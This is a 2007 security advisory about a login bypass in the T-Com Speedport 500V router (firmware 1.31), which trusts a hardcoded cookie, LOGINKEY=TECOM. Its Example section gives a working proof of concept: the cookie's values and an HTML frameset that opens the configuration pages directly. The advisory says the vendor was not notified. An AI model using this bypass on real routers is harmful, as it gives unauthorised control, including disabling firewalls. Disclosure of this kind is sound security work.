Virginity Security Advisory 2007-001 : T-Com Speedport 500V Login bypass



- - - --------------------------------------------------------------------
Virginity Security Advisory 2007-001
- - - --------------------------------------------------------------------
DATE : 2007-01-19 15:32 GMT
TYPE : remote
VERSIONS AFFECTED : T-Com Speedport 500V Firmware 1.31
AUTHOR : Virginity
ADVISORY NUMBER : 005
- - - --------------------------------------------------------------------


Description:

The Speedport 500V is a broadband-router which is sold in germany along
with ADSL lines. (just so you know)

The system is stupid and verifies wether you have entered the correct
password by setting a cookie with the content LOGINKEY=TECOM
(this is hardcoded and can not be changed)
If an attacker simply creates this cookie he can bypass password
authentication by simply calling the configuration html sites directly.

The attacker then has nearly full system access (you cannot change the
system password without knowing the old one) and can change system
configuration e.g. disable the firewall. You can also perform a firmware
upgrade, which allows you to reset the password to the default one, which
now gives you full system access.

Vendor has not been notified. I don't think they care^^.

- - - --------------------------------------------------------------------


Example:

Create a cookie like this:

Name: LOGINKEY
Content: TECOM
Host: <ipaddress> <- replace this by your routers ipaddress ;)
Path: /
Expires: Never

create a html page like this and open it in your browser:

<html>
<frameset rows="44,*" border=0 frameborder=0 framespacing=0">
<frame src="http://<ipaddress>/b_banner.htm" name="banner">
<frameset cols="170,*" border=0 frameborder=0 framespacing=0>
<frame src="http://<ipaddress>/m_startseite.htm" name="menu">
<frame src="http://<ipaddress>/hcti_startseite.htm" name="hcti">
</frameset>
</frameset>
</html>

this will bypass the login screen and lead you directly to configuration
menu.

- - - --------------------------------------------------------------------


Workaround:

Download the Sourcecode from the vendor (GPL), replace TECOM with something
else, try bulding it, and then try installing it on the hardware.
i did not try this. its stupid and does not really solve the problem.

- - - --------------------------------------------------------------------


Personal note:

Still here... sadly not dead yet. maybe i should hack the NSA so they kill
me? *lol* guess i'd have to learn some real things.... greetz to s.
and that other admin.

- - - --------------------------------------------------------------------